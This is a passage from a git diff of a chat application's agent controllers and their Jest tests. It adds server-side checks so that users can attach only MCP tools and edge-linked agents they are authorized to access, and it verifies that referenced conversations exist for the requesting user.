afterAll(async () => { + await mongoose.disconnect(); + await mongoServer.stop(); + }); + + beforeEach(async () => { + await Agent.deleteMany({}); + jest.clearAllMocks(); + + getMCPServersRegistry.mockImplementation(() => ({ + getAllServerConfigs: mockGetAllServerConfigs, + })); + mockGetAllServerConfigs.mockResolvedValue({ + authorizedServer: { type: 'sse', url: 'https://authorized.example.com' }, + anotherServer: { type: 'sse', url: 'https://another.example.com' }, + }); + + mockReq = { + user: { + id: new mongoose.Types.ObjectId().toString(), + role: 'USER', + }, + body: {}, + params: {}, + query: {}, + app: { locals: { fileStrategy: 'local' } }, + }; + + mockRes = { + status: jest.fn().mockReturnThis(), + json: jest.fn().mockReturnThis(), + }; + }); + + describe('filterAuthorizedTools', () => { + const availableTools = { web_search: true, custom_tool: true }; + const userId = 'test-user-123'; + + test('should keep authorized MCP tools and strip unauthorized ones', async () => { + const result = await filterAuthorizedTools({ + tools: [`toolA${d}authorizedServer`, `toolB${d}forbiddenServer`, 'web_search'], + userId, + availableTools, + }); + + expect(result).toContain(`toolA${d}authorizedServer`); + expect(result).toContain('web_search'); + expect(result).not.toContain(`toolB${d}forbiddenServer`); + }); + + test('should keep system tools without querying MCP registry', async () => { + const result = await filterAuthorizedTools({ + tools: ['execute_code', 'file_search', 'web_search'], + userId, + availableTools: {}, + }); + + expect(result).toEqual(['execute_code', 'file_search', 'web_search']); + expect(mockGetAllServerConfigs).not.toHaveBeenCalled(); + }); + + test('should not query MCP registry when no MCP tools are present', async () => { + const result = await filterAuthorizedTools({ + tools: ['web_search', 'custom_tool'], + userId, + availableTools, + }); + + expect(result).toEqual(['web_search', 'custom_tool']); + expect(mockGetAllServerConfigs).not.toHaveBeenCalled(); + }); + + test('should filter all MCP tools when registry is uninitialized', async () => { + getMCPServersRegistry.mockImplementation(() => { + throw new Error('MCPServersRegistry has not been initialized.'); + }); + + const result = await filterAuthorizedTools({ + tools: [`toolA${d}someServer`, 'web_search'], + userId, + availableTools, + }); + + expect(result).toEqual(['web_search']); + expect(result).not.toContain(`toolA${d}someServer`); + }); + + test('should handle mixed authorized and unauthorized MCP tools', async () => { + const result = await filterAuthorizedTools({ + tools: [ + 'web_search', + `search${d}authorizedServer`, + `attack${d}victimServer`, + 'execute_code', + `list${d}anotherServer`, + `steal${d}nonexistent`, + ], + userId, + availableTools, + }); + + expect(result).toEqual([ + 'web_search', + `search${d}authorizedServer`, + 'execute_code', + `list${d}anotherServer`, + ]); + }); + + test('should handle empty tools array', async () => { + const result = await filterAuthorizedTools({ + tools: [], + userId, + availableTools, + }); + + expect(result).toEqual([]); + expect(mockGetAllServerConfigs).not.toHaveBeenCalled(); + }); + + test('should handle null/undefined tool entries gracefully', async () => { + const result = await filterAuthorizedTools({ + tools: [null, undefined, '', 'web_search'], + userId, + availableTools, + }); + + expect(result).toEqual(['web_search']); + }); + + test('should call getAllServerConfigs with the correct userId', async () => { + await filterAuthorizedTools({ + tools: [`tool${d}authorizedServer`], + userId: 'specific-user-id', + availableTools, + }); + + expect(mockGetAllServerConfigs).toHaveBeenCalledWith('specific-user-id'); + }); + + test('should only call getAllServerConfigs once even with multiple MCP tools', async () => { + await filterAuthorizedTools({ + tools: [`tool1${d}authorizedServer`, `tool2${d}anotherServer`, `tool3${d}unknownServer`], + userId, + availableTools, + }); + + expect(mockGetAllServerConfigs).toHaveBeenCalledTimes(1); + }); + + test('should preserve existing MCP tools when registry is unavailable', async () => { + getMCPServersRegistry.mockImplementation(() => { + throw new Error('MCPServersRegistry has not been initialized.'); + }); + + const existingTools = [`toolA${d}serverA`, `toolB${d}serverB`]; + + const result = await filterAuthorizedTools({ + tools: [...existingTools, `newTool${d}unknownServer`, 'web_search'], + userId, + availableTools, + existingTools, + }); + + expect(result).toContain(`toolA${d}serverA`); + expect(result).toContain(`toolB${d}serverB`); + expect(result).toContain('web_search'); + expect(result).not.toContain(`newTool${d}unknownServer`); + }); + + test('should still reject all MCP tools when registry is unavailable and no existingTools', async () => { + getMCPServersRegistry.mockImplementation(() => { + throw new Error('MCPServersRegistry has not been initialized.'); + }); + + const result = await filterAuthorizedTools({ + tools: [`toolA${d}serverA`, 'web_search'], + userId, + availableTools, + }); + + expect(result).toEqual(['web_search']); + }); + + test('should not preserve malformed existing tools when registry is unavailable', async () => { + getMCPServersRegistry.mockImplementation(() => { + throw new Error('MCPServersRegistry has not been initialized.'); + }); + + const malformedTool = `a${d}b${d}c`; + const result = await filterAuthorizedTools({ + tools: [malformedTool, `legit${d}serverA`, 'web_search'], + userId, + availableTools, + existingTools: [malformedTool, `legit${d}serverA`], + }); + + expect(result).toContain(`legit${d}serverA`); + expect(result).toContain('web_search'); + expect(result).not.toContain(malformedTool); + }); + + test('should reject malformed MCP tool keys with multiple delimiters', async () => { + const result = await filterAuthorizedTools({ + tools: [ + `attack${d}victimServer${d}authorizedServer`, + `legit${d}authorizedServer`, + `a${d}b${d}c${d}d`, + 'web_search', + ], + userId, + availableTools, + }); + + expect(result).toEqual([`legit${d}authorizedServer`, 'web_search']); + expect(result).not.toContainEqual(expect.stringContaining('victimServer')); + expect(result).not.toContainEqual(expect.stringContaining(`a${d}b`)); + }); + }); + + describe('createAgentHandler - MCP tool authorization', () => { + test('should strip unauthorized MCP tools on create', async () => { + mockReq.body = { + provider: 'openai', + model: 'gpt-4', + name: 'MCP Test Agent', + tools: ['web_search', `validTool${d}authorizedServer`, `attack${d}forbiddenServer`], + }; + + await createAgentHandler(mockReq, mockRes); + + expect(mockRes.status).toHaveBeenCalledWith(201); + const agent = mockRes.json.mock.calls[0][0]; + expect(agent.tools).toContain('web_search'); + expect(agent.tools).toContain(`validTool${d}authorizedServer`); + expect(agent.tools).not.toContain(`attack${d}forbiddenServer`); + }); + + test('should not 500 when MCP registry is uninitialized', async () => { + getMCPServersRegistry.mockImplementation(() => { + throw new Error('MCPServersRegistry has not been initialized.'); + }); + + mockReq.body = { + provider: 'openai', + model: 'gpt-4', + name: 'MCP Uninitialized Test', + tools: [`tool${d}someServer`, 'web_search'], + }; + + await createAgentHandler(mockReq, mockRes); + + expect(mockRes.status).toHaveBeenCalledWith(201); + const agent = mockRes.json.mock.calls[0][0]; + expect(agent.tools).toEqual(['web_search']); + }); + + test('should store mcpServerNames only for authorized servers', async () => { + mockReq.body = { + provider: 'openai', + model: 'gpt-4', + name: 'MCP Names Test', + tools: [`toolA${d}authorizedServer`, `toolB${d}forbiddenServer`], + }; + + await createAgentHandler(mockReq, mockRes); + + expect(mockRes.status).toHaveBeenCalledWith(201); + const agent = mockRes.json.mock.calls[0][0]; + const agentInDb = await Agent.findOne({ id: agent.id }); + expect(agentInDb.mcpServerNames).toContain('authorizedServer'); + expect(agentInDb.mcpServerNames).not.toContain('forbiddenServer'); + }); + }); + + describe('updateAgentHandler - MCP tool authorization', () => { + let existingAgentId; + let existingAgentAuthorId; + + beforeEach(async () => { + existingAgentAuthorId = new mongoose.Types.ObjectId(); + const agent = await Agent.create({ + id: `agent_${uuidv4()}`, + name: 'Original Agent', + provider: 'openai', + model: 'gpt-4', + author: existingAgentAuthorId, + tools: ['web_search', `existingTool${d}authorizedServer`], + mcpServerNames: ['authorizedServer'], + versions: [ + { + name: 'Original Agent', + provider: 'openai', + model: 'gpt-4', + tools: ['web_search', `existingTool${d}authorizedServer`], + createdAt: new Date(), + updatedAt: new Date(), + }, + ], + }); + existingAgentId = agent.id; + }); + + test('should preserve existing MCP tools even if editor lacks access', async () => { + mockGetAllServerConfigs.mockResolvedValue({}); + + mockReq.user.id = existingAgentAuthorId.toString(); + mockReq.params.id = existingAgentId; + mockReq.body = { + tools: ['web_search', `existingTool${d}authorizedServer`], + }; + + await updateAgentHandler(mockReq, mockRes); + + expect(mockRes.json).toHaveBeenCalled(); + const updatedAgent = mockRes.json.mock.calls[0][0]; + expect(updatedAgent.tools).toContain(`existingTool${d}authorizedServer`); + expect(updatedAgent.tools).toContain('web_search'); + }); + + test('should reject newly added unauthorized MCP tools', async () => { + mockReq.user.id = existingAgentAuthorId.toString(); + mockReq.params.id = existingAgentId; + mockReq.body = { + tools: ['web_search', `existingTool${d}authorizedServer`, `attack${d}forbiddenServer`], + }; + + await updateAgentHandler(mockReq, mockRes); + + expect(mockRes.json).toHaveBeenCalled(); + const updatedAgent = mockRes.json.mock.calls[0][0]; + expect(updatedAgent.tools).toContain('web_search'); + expect(updatedAgent.tools).toContain(`existingTool${d}authorizedServer`); + expect(updatedAgent.tools).not.toContain(`attack${d}forbiddenServer`); + }); + + test('should allow adding authorized MCP tools', async () => { + mockReq.user.id = existingAgentAuthorId.toString(); + mockReq.params.id = existingAgentId; + mockReq.body = { + tools: ['web_search', `existingTool${d}authorizedServer`, `newTool${d}anotherServer`], + }; + + await updateAgentHandler(mockReq, mockRes); + + expect(mockRes.json).toHaveBeenCalled(); + const updatedAgent = mockRes.json.mock.calls[0][0]; + expect(updatedAgent.tools).toContain(`newTool${d}anotherServer`); + }); + + test('should not query MCP registry when no new MCP tools added', async () => { + mockReq.user.id = existingAgentAuthorId.toString(); + mockReq.params.id = existingAgentId; + mockReq.body = { + tools: ['web_search', `existingTool${d}authorizedServer`], + }; + + await updateAgentHandler(mockReq, mockRes); + + expect(mockGetAllServerConfigs).not.toHaveBeenCalled(); + }); + + test('should preserve existing MCP tools when registry unavailable and user edits agent', async () => { + getMCPServersRegistry.mockImplementation(() => { + throw new Error('MCPServersRegistry has not been initialized.'); + }); + + mockReq.user.id = existingAgentAuthorId.toString(); + mockReq.params.id = existingAgentId; + mockReq.body = { + name: 'Renamed After Restart', + tools: ['web_search', `existingTool${d}authorizedServer`], + }; + + await updateAgentHandler(mockReq, mockRes); + + expect(mockRes.json).toHaveBeenCalled(); + const updatedAgent = mockRes.json.mock.calls[0][0]; + expect(updatedAgent.tools).toContain(`existingTool${d}authorizedServer`); + expect(updatedAgent.tools).toContain('web_search'); + expect(updatedAgent.name).toBe('Renamed After Restart'); + }); + + test('should preserve existing MCP tools when server not in configs (disconnected)', async () => { + mockGetAllServerConfigs.mockResolvedValue({}); + + mockReq.user.id = existingAgentAuthorId.toString(); + mockReq.params.id = existingAgentId; + mockReq.body = { + name: 'Edited While Disconnected', + tools: ['web_search', `existingTool${d}authorizedServer`], + }; + + await updateAgentHandler(mockReq, mockRes); + + expect(mockRes.json).toHaveBeenCalled(); + const updatedAgent = mockRes.json.mock.calls[0][0]; + expect(updatedAgent.tools).toContain(`existingTool${d}authorizedServer`); + expect(updatedAgent.name).toBe('Edited While Disconnected'); + }); + }); + + describe('duplicateAgentHandler - MCP tool authorization', () => { + let sourceAgentId; + let sourceAgentAuthorId; + + beforeEach(async () => { + sourceAgentAuthorId = new mongoose.Types.ObjectId(); + const agent = await Agent.create({ + id: `agent_${uuidv4()}`, + name: 'Source Agent', + provider: 'openai', + model: 'gpt-4', + author: sourceAgentAuthorId, + tools: ['web_search', `tool${d}authorizedServer`, `tool${d}forbiddenServer`], + mcpServerNames: ['authorizedServer', 'forbiddenServer'], + versions: [ + { + name: 'Source Agent', + provider: 'openai', + model: 'gpt-4', + tools: ['web_search', `tool${d}authorizedServer`, `tool${d}forbiddenServer`], + createdAt: new Date(), + updatedAt: new Date(), + }, + ], + }); + sourceAgentId = agent.id; + }); + + test('should strip unauthorized MCP tools from duplicated agent', async () => { + mockGetAllServerConfigs.mockResolvedValue({ + authorizedServer: { type: 'sse' }, + }); + + mockReq.user.id = sourceAgentAuthorId.toString(); + mockReq.params.id = sourceAgentId; + + await duplicateAgentHandler(mockReq, mockRes); + + expect(mockRes.status).toHaveBeenCalledWith(201); + const { agent: newAgent } = mockRes.json.mock.calls[0][0]; + expect(newAgent.id).not.toBe(sourceAgentId); + expect(newAgent.tools).toContain('web_search'); + expect(newAgent.tools).toContain(`tool${d}authorizedServer`); + expect(newAgent.tools).not.toContain(`tool${d}forbiddenServer`); + + const agentInDb = await Agent.findOne({ id: newAgent.id }); + expect(agentInDb.mcpServerNames).toContain('authorizedServer'); + expect(agentInDb.mcpServerNames).not.toContain('forbiddenServer'); + }); + + test('should preserve source agent MCP tools when registry is unavailable', async () => { + getMCPServersRegistry.mockImplementation(() => { + throw new Error('MCPServersRegistry has not been initialized.'); + }); + + mockReq.user.id = sourceAgentAuthorId.toString(); + mockReq.params.id = sourceAgentId; + + await duplicateAgentHandler(mockReq, mockRes); + + expect(mockRes.status).toHaveBeenCalledWith(201); + const { agent: newAgent } = mockRes.json.mock.calls[0][0]; + expect(newAgent.tools).toContain('web_search'); + expect(newAgent.tools).toContain(`tool${d}authorizedServer`); + expect(newAgent.tools).toContain(`tool${d}forbiddenServer`); + }); + }); + + describe('revertAgentVersionHandler - MCP tool authorization', () => { + let existingAgentId; + let existingAgentAuthorId; + + beforeEach(async () => { + existingAgentAuthorId = new mongoose.Types.ObjectId(); + const agent = await Agent.create({ + id: `agent_${uuidv4()}`, + name: 'Reverted Agent V2', + provider: 'openai', + model: 'gpt-4', + author: existingAgentAuthorId, + tools: ['web_search'], + versions: [ + { + name: 'Reverted Agent V1', + provider: 'openai', + model: 'gpt-4', + tools: ['web_search', `oldTool${d}revokedServer`], + createdAt: new Date(Date.now() - 10000), + updatedAt: new Date(Date.now() - 10000), + }, + { + name: 'Reverted Agent V2', + provider: 'openai', + model: 'gpt-4', + tools: ['web_search'], + createdAt: new Date(), + updatedAt: new Date(), + }, + ], + }); + existingAgentId = agent.id; + }); + + test('should strip unauthorized MCP tools after reverting to a previous version', async () => { + mockGetAllServerConfigs.mockResolvedValue({ + authorizedServer: { type: 'sse' }, + }); + + mockReq.user.id = existingAgentAuthorId.toString(); + mockReq.params.id = existingAgentId; + mockReq.body = { version_index: 0 }; + + await revertAgentVersionHandler(mockReq, mockRes); + + expect(mockRes.json).toHaveBeenCalled(); + const result = mockRes.json.mock.calls[0][0]; + expect(result.tools).toContain('web_search'); + expect(result.tools).not.toContain(`oldTool${d}revokedServer`); + + const agentInDb = await Agent.findOne({ id: existingAgentId }); + expect(agentInDb.tools).toContain('web_search'); + expect(agentInDb.tools).not.toContain(`oldTool${d}revokedServer`); + }); + + test('should keep authorized MCP tools after revert', async () => { + await Agent.updateOne( + { id: existingAgentId }, + { $set: { 'versions.0.tools': ['web_search', `tool${d}authorizedServer`] } }, + ); + + mockReq.user.id = existingAgentAuthorId.toString(); + mockReq.params.id = existingAgentId; + mockReq.body = { version_index: 0 }; + + await revertAgentVersionHandler(mockReq, mockRes); + + expect(mockRes.json).toHaveBeenCalled(); + const result = mockRes.json.mock.calls[0][0]; + expect(result.tools).toContain('web_search'); + expect(result.tools).toContain(`tool${d}authorizedServer`); + }); + + test('should preserve version MCP tools when registry is unavailable on revert', async () => { + await Agent.updateOne( + { id: existingAgentId }, + { + $set: { + 'versions.0.tools': [ + 'web_search', + `validTool${d}authorizedServer`, + `otherTool${d}anotherServer`, + ], + }, + }, + ); + + getMCPServersRegistry.mockImplementation(() => { + throw new Error('MCPServersRegistry has not been initialized.'); + }); + + mockReq.user.id = existingAgentAuthorId.toString(); + mockReq.params.id = existingAgentId; + mockReq.body = { version_index: 0 }; + + await revertAgentVersionHandler(mockReq, mockRes); + + expect(mockRes.json).toHaveBeenCalled(); + const result = mockRes.json.mock.calls[0][0]; + expect(result.tools).toContain('web_search'); + expect(result.tools).toContain(`validTool${d}authorizedServer`); + expect(result.tools).toContain(`otherTool${d}anotherServer`); + + const agentInDb = await Agent.findOne({ id: existingAgentId }); + expect(agentInDb.tools).toContain(`validTool${d}authorizedServer`); + expect(agentInDb.tools).toContain(`otherTool${d}anotherServer`); + }); + }); +}); diff --git a/api/server/controllers/agents/openai.js b/api/server/controllers/agents/openai.js index e8561f15fe..189cb29d8d 100644 --- a/api/server/controllers/agents/openai.js +++ b/api/server/controllers/agents/openai.js @@ -26,7 +26,7 @@ const { createToolEndCallback } = require('~/server/controllers/agents/callbacks const { findAccessibleResources } = require('~/server/services/PermissionService'); const { spendTokens, spendStructuredTokens } = require('~/models/spendTokens'); const { getMultiplier, getCacheMultiplier } = require('~/models/tx'); -const { getConvoFiles } = require('~/models/Conversation'); +const { getConvoFiles, getConvo } = require('~/models/Conversation'); const { getAgent, getAgents } = require('~/models/Agent'); const db = require('~/models'); @@ -151,8 +151,6 @@ const OpenAIChatCompletionController = async (req, res) => { } const responseId = `chatcmpl-${nanoid()}`; - const conversationId = request.conversation_id ?? nanoid(); - const parentMessageId = request.parent_message_id ?? null; const created = Math.floor(Date.now() / 1000); /** @type {import('@librechat/api').OpenAIResponseContext} — key must be `requestId` to match the type used by createChunk/buildNonStreamingResponse */ @@ -178,6 +176,23 @@ const OpenAIChatCompletionController = async (req, res) => { }); try { + if (request.conversation_id != null) { + if (typeof request.conversation_id !== 'string') { + return sendErrorResponse( + res, + 400, + 'conversation_id must be a string', + 'invalid_request_error', + ); + } + if (!(await getConvo(req.user?.id, request.conversation_id))) { + return sendErrorResponse(res, 404, 'Conversation not found', 'invalid_request_error'); + } + } + + const conversationId = request.conversation_id ?? nanoid(); + const parentMessageId = request.parent_message_id ?? null; + // Build allowed providers set const allowedProviders = new Set( appConfig?.endpoints?.[EModelEndpoint.agents]?.allowedProviders, @@ -265,6 +280,7 @@ const OpenAIChatCompletionController = async (req, res) => { toolRegistry: primaryConfig.toolRegistry, userMCPAuthMap: primaryConfig.userMCPAuthMap, tool_resources: primaryConfig.tool_resources, + actionsEnabled: primaryConfig.actionsEnabled, }); }, toolEndCallback, diff --git a/api/server/controllers/agents/responses.js b/api/server/controllers/agents/responses.js index 83e6ad6efd..30ccacdba8 100644 --- a/api/server/controllers/agents/responses.js +++ b/api/server/controllers/agents/responses.js @@ -292,10 +292,6 @@ const createResponse = async (req, res) => { // Generate IDs const responseId = generateResponseId(); - const conversationId = request.previous_response_id ?? uuidv4(); - const parentMessageId = null; - - // Create response context const context = createResponseContext(request, responseId); logger.debug( @@ -314,6 +310,23 @@ const createResponse = async (req, res) => { }); try { + if (request.previous_response_id != null) { + if (typeof request.previous_response_id !== 'string') { + return sendResponsesErrorResponse( + res, + 400, + 'previous_response_id must be a string', + 'invalid_request', + ); + } + if (!(await getConvo(req.user?.id, request.previous_response_id))) { + return sendResponsesErrorResponse(res, 404, 'Conversation not found', 'not_found'); + } + } + + const conversationId = request.previous_response_id ?? uuidv4(); + const parentMessageId = null; + // Build allowed providers set const allowedProviders = new Set( appConfig?.endpoints?.[EModelEndpoint.agents]?.allowedProviders, @@ -429,6 +442,7 @@ const createResponse = async (req, res) => { toolRegistry: primaryConfig.toolRegistry, userMCPAuthMap: primaryConfig.userMCPAuthMap, tool_resources: primaryConfig.tool_resources, + actionsEnabled: primaryConfig.actionsEnabled, }); }, toolEndCallback, @@ -586,6 +600,7 @@ const createResponse = async (req, res) => { toolRegistry: primaryConfig.toolRegistry, userMCPAuthMap: primaryConfig.userMCPAuthMap, tool_resources: primaryConfig.tool_resources, + actionsEnabled: primaryConfig.actionsEnabled, }); }, toolEndCallback, diff --git a/api/server/controllers/agents/v1.js b/api/server/controllers/agents/v1.js index a2c0d55186..309873e56c 100644 --- a/api/server/controllers/agents/v1.js +++ b/api/server/controllers/agents/v1.js @@ -6,6 +6,7 @@ const { agentCreateSchema, agentUpdateSchema, refreshListAvatars, + collectEdgeAgentIds, mergeAgentOcrConversion, MAX_AVATAR_REFRESH_AGENTS, convertOcrToContextInPlace, @@ -35,6 +36,7 @@ const { } = require('~/models/Agent'); const { findPubliclyAccessibleResources, + getResourcePermissionsMap, findAccessibleResources, hasPublicPermission, grantPermission, @@ -47,6 +49,7 @@ const { refreshS3Url } = require('~/server/services/Files/S3/crud'); const { filterFile } = require('~/server/services/Files/process'); const { updateAction, getActions } = require('~/models/Action'); const { getCachedTools } = require('~/server/services/Config'); +const { getMCPServersRegistry } = require('~/config'); const { getLogStores } = require('~/cache'); const systemTools = { @@ -58,6 +61,116 @@ const systemTools = { const MAX_SEARCH_LEN = 100; const escapeRegex = (str = '') => str.replace(/[.*+?^${}()|[\]\\]/g, '\\$&'); +/** + * Validates that the requesting user has VIEW access to every agent referenced in edges. + * Agents that do not exist in the database are skipped — at create time, the `from` field + * often references the agent being built, which has no DB record yet. + * @param {import('librechat-data-provider').GraphEdge[]} edges + * @param {string} userId + * @param {string} userRole - Used for group/role principal resolution + * @returns {Promise} Agent IDs the user cannot VIEW (empty if all accessible) + */ +const validateEdgeAgentAccess = async (edges, userId, userRole) => { + const edgeAgentIds = collectEdgeAgentIds(edges); + if (edgeAgentIds.size === 0) { + return []; + } + + const agents = (await Promise.all([...edgeAgentIds].map((id) => getAgent({ id })))).filter( + Boolean, + ); + + if (agents.length === 0) { + return []; + } + + const permissionsMap = await getResourcePermissionsMap({ + userId, + role: userRole, + resourceType: ResourceType.AGENT, + resourceIds: agents.map((a) => a._id), + }); + + return agents + .filter((a) => { + const bits = permissionsMap.get(a._id.toString()) ?? 0; + return (bits & PermissionBits.VIEW) === 0; + }) + .map((a) => a.id); +}; + +/** + * Filters tools to only include those the user is authorized to use. + * MCP tools must match the exact format `{toolName}_mcp_{serverName}` (exactly 2 segments). + * Multi-delimiter keys are rejected to prevent authorization/execution mismatch. + * Non-MCP tools must appear in availableTools (global tool cache) or systemTools. + * + * When `existingTools` is provided and the MCP registry is unavailable (e.g. server restart), + * tools already present on the agent are preserved rather than stripped — they were validated + * when originally added, and we cannot re-verify them without the registry. + * @param {object} params + * @param {string[]} params.tools - Raw tool strings from the request + * @param {string} params.userId - Requesting user ID for MCP server access check + * @param {Record} params.availableTools - Global non-MCP tool cache + * @param {string[]} [params.existingTools] - Tools already persisted on the agent document + * @returns {Promise} Only the authorized subset of tools + */ +const filterAuthorizedTools = async ({ tools, userId, availableTools, existingTools }) => { + const filteredTools = []; + let mcpServerConfigs; + let registryUnavailable = false; + const existingToolSet = existingTools?.length ? new Set(existingTools) : null; + + for (const tool of tools) { + if (availableTools[tool] || systemTools[tool]) { + filteredTools.push(tool); + continue; + } + + if (!tool?.includes(Constants.mcp_delimiter)) { + continue; + } + + if (mcpServerConfigs === undefined) { + try { + mcpServerConfigs = (await getMCPServersRegistry().getAllServerConfigs(userId)) ?? {}; + } catch (e) { + logger.warn( + '[filterAuthorizedTools] MCP registry unavailable, filtering all MCP tools', + e.message, + ); + mcpServerConfigs = {}; + registryUnavailable = true; + } + } + + const parts = tool.split(Constants.mcp_delimiter); + if (parts.length !== 2) { + logger.warn( + `[filterAuthorizedTools] Rejected malformed MCP tool key "${tool}" for user ${userId}`, + ); + continue; + } + + if (registryUnavailable && existingToolSet?.has(tool)) { + filteredTools.push(tool); + continue; + } + + const [, serverName] = parts; + if (!serverName || !Object.hasOwn(mcpServerConfigs, serverName)) { + logger.warn( + `[filterAuthorizedTools] Rejected MCP tool "${tool}" — server "${serverName}" not accessible to user ${userId}`, + ); + continue; + } + + filteredTools.push(tool); + } + + return filteredTools; +}; + /** * Creates an Agent. * @route POST /Agents @@ -75,22 +188,24 @@ const createAgentHandler = async (req, res) => { agentData.model_parameters = removeNullishValues(agentData.model_parameters, true); } - const { id: userId } = req.user; + const { id: userId, role: userRole } = req.user; + + if (agentData.edges?.length) { + const unauthorized = await validateEdgeAgentAccess(agentData.edges, userId, userRole); + if (unauthorized.length > 0) { + return res.status(403).json({ + error: 'You do not have access to one or more agents referenced in edges', + agent_ids: unauthorized, + }); + } + } agentData.id = `agent_${nanoid()}`; agentData.author = userId; agentData.tools = []; const availableTools = (await getCachedTools()) ?? {}; - for (const tool of tools) { - if (availableTools[tool]) { - agentData.tools.push(tool); - } else if (systemTools[tool]) { - agentData.tools.push(tool); - } else if (tool.includes(Constants.mcp_delimiter)) { - agentData.tools.push(tool); - } - } + agentData.tools = await filterAuthorizedTools({ tools, userId, availableTools }); const agent = await createAgent(agentData); @@ -243,6 +358,17 @@ const updateAgentHandler = async (req, res) => { updateData.avatar = avatarField; } + if (updateData.edges?.length) { + const { id: userId, role: userRole } = req.user; + const unauthorized = await validateEdgeAgentAccess(updateData.edges, userId, userRole); + if (unauthorized.length > 0) { + return res.status(403).json({ + error: 'You do not have access to one or more agents referenced in edges', + agent_ids: unauthorized, + }); + } + } + // Convert OCR to context in incoming updateData convertOcrToContextInPlace(updateData); @@ -261,6 +387,26 @@ const updateAgentHandler = async (req, res) => { updateData.tools = ocrConversion.tools; } + if (updateData.tools) { + const existingToolSet = new Set(existingAgent.tools ?? []); + const newMCPTools = updateData.tools.filter( + (t) => !existingToolSet.has(t) && t?.includes(Constants.mcp_delimiter), + ); + + if (newMCPTools.length > 0) { + const availableTools = (await getCachedTools()) ?? {}; + const approvedNew = await filterAuthorizedTools({ + tools: newMCPTools, + userId: req.user.id, + availableTools, + }); + const rejectedSet = new Set(newMCPTools.filter((t) => !approvedNew.includes(t))); + if (rejectedSet.size > 0) { + updateData.tools = updateData.tools.filter((t) => !rejectedSet.has(t)); + } + } + } + let updatedAgent = Object.keys(updateData).length > 0 ? await updateAgent({ id }, updateData, { @@ -371,7 +517,7 @@ const duplicateAgentHandler = async (req, res) => { */ const duplicateAction = async (action) => { const newActionId = nanoid(); - const [domain] = action.action_id.split(actionDelimiter); + const { domain } = action.metadata; const fullActionId = `${domain}${actionDelimiter}${newActionId}`; // Sanitize sensitive metadata before persisting @@ -381,7 +527,7 @@ const duplicateAgentHandler = async (req, res) => { } const newAction = await updateAction( - { action_id: newActionId }, + { action_id: newActionId, agent_id: newAgentId }, { metadata: filteredMetadata, agent_id: newAgentId, @@ -403,6 +549,17 @@ const duplicateAgentHandler = async (req, res) => { const agentActions = await Promise.all(promises); newAgentData.actions = agentActions; + + if (newAgentData.tools?.length) { + const availableTools = (await getCachedTools()) ?? {}; + newAgentData.tools = await filterAuthorizedTools({ + tools: newAgentData.tools, + userId, + availableTools, + existingTools: newAgentData.tools, + }); + } + const newAgent = await createAgent(newAgentData); try { @@ -731,7 +888,24 @@ const revertAgentVersionHandler = async (req, res) => { // Permissions are enforced via route middleware (ACL EDIT) - const updatedAgent = await revertAgentVersion({ id }, version_index); + let updatedAgent = await revertAgentVersion({ id }, version_index); + + if (updatedAgent.tools?.length) { + const availableTools = (await getCachedTools()) ?? {}; + const filteredTools = await filterAuthorizedTools({ + tools: updatedAgent.tools, + userId: req.user.id, + availableTools, + existingTools: updatedAgent.tools, + }); + if (filteredTools.length !== updatedAgent.tools.length) { + updatedAgent = await updateAgent( + { id }, + { tools: filteredTools }, + { updatingUserId: req.user.id }, + ); + } + } if (updatedAgent.author) { updatedAgent.author = updatedAgent.author.toString(); @@ -799,4 +973,5 @@ module.exports = { uploadAgentAvatar: uploadAgentAvatarHandler, revertAgentVersion: revertAgentVersionHandler, getAgentCategories, + filterAuthorizedTools, }; diff --git a/api/server/controllers/agents/v1.spec.js b/api/server/controllers/agents/v1.spec.js index ce68cc241f..ede4ea416a 100644 --- a/api/server/controllers/agents/v1.spec.js +++ b/api/server/controllers/agents/v1.spec.js @@ -2,7 +2,7 @@ const mongoose = require('mongoose'); const { nanoid } = require('nanoid'); const { v4: uuidv4 } = require('uuid'); const { agentSchema } = require('@librechat/data-schemas'); -const { FileSources } = require('librechat-data-provider'); +const { FileSources, PermissionBits } = require('librechat-data-provider'); const { MongoMemoryServer } = require('mongodb-memory-server'); // Only mock the dependencies that are not database-related @@ -46,9 +46,9 @@ jest.mock('~/models/File', () => ({ jest.mock('~/server/services/PermissionService', () => ({ findAccessibleResources: jest.fn().mockResolvedValue([]), findPubliclyAccessibleResources: jest.fn().mockResolvedValue([]), + getResourcePermissionsMap: jest.fn().mockResolvedValue(new Map()), grantPermission: jest.fn(), hasPublicPermission: jest.fn().mockResolvedValue(false), - checkPermission: jest.fn().mockResolvedValue(true), })); jest.mock('~/models', () => ({ @@ -74,6 +74,7 @@ const { const { findAccessibleResources, findPubliclyAccessibleResources, + getResourcePermissionsMap, } = require('~/server/services/PermissionService'); const { refreshS3Url } = require('~/server/services/Files/S3/crud'); @@ -1647,4 +1648,112 @@ describe('Agent Controllers - Mass Assignment Protection', () => { expect(agent.avatar.filepath).toBe('old-s3-path.jpg'); }); }); + + describe('Edge ACL validation', () => { + let targetAgent; + + beforeEach(async () => { + targetAgent = await Agent.create({ + id: `agent_${nanoid()}`, + author: new mongoose.Types.ObjectId().toString(), + name: 'Target Agent', + provider: 'openai', + model: 'gpt-4', + tools: [], + }); + }); + + test('createAgentHandler should return 403 when user lacks VIEW on an edge-referenced agent', async () => { + const permMap = new Map(); + getResourcePermissionsMap.mockResolvedValueOnce(permMap); + + mockReq.body = { + name: 'Attacker Agent', + provider: 'openai', + model: 'gpt-4', + edges: [{ from: 'self_placeholder', to: targetAgent.id, edgeType: 'handoff' }], + }; + + await createAgentHandler(mockReq, mockRes); + + expect(mockRes.status).toHaveBeenCalledWith(403); + const response = mockRes.json.mock.calls[0][0]; + expect(response.agent_ids).toContain(targetAgent.id); + }); + + test('createAgentHandler should succeed when user has VIEW on all edge-referenced agents', async () => { + const permMap = new Map([[targetAgent._id.toString(), 1]]); + getResourcePermissionsMap.mockResolvedValueOnce(permMap); + + mockReq.body = { + name: 'Legit Agent', + provider: 'openai', + model: 'gpt-4', + edges: [{ from: 'self_placeholder', to: targetAgent.id, edgeType: 'handoff' }], + }; + + await createAgentHandler(mockReq, mockRes); + + expect(mockRes.status).toHaveBeenCalledWith(201); + }); + + test('createAgentHandler should allow edges referencing non-existent agents (self-reference at create time)', async () => { + mockReq.body = { + name: 'Self-Ref Agent', + provider: 'openai', + model: 'gpt-4', + edges: [{ from: 'agent_does_not_exist_yet', to: 'agent_also_new', edgeType: 'handoff' }], + }; + + await createAgentHandler(mockReq, mockRes); + + expect(mockRes.status).toHaveBeenCalledWith(201); + }); + + test('updateAgentHandler should return 403 when user lacks VIEW on an edge-referenced agent', async () => { + const ownedAgent = await 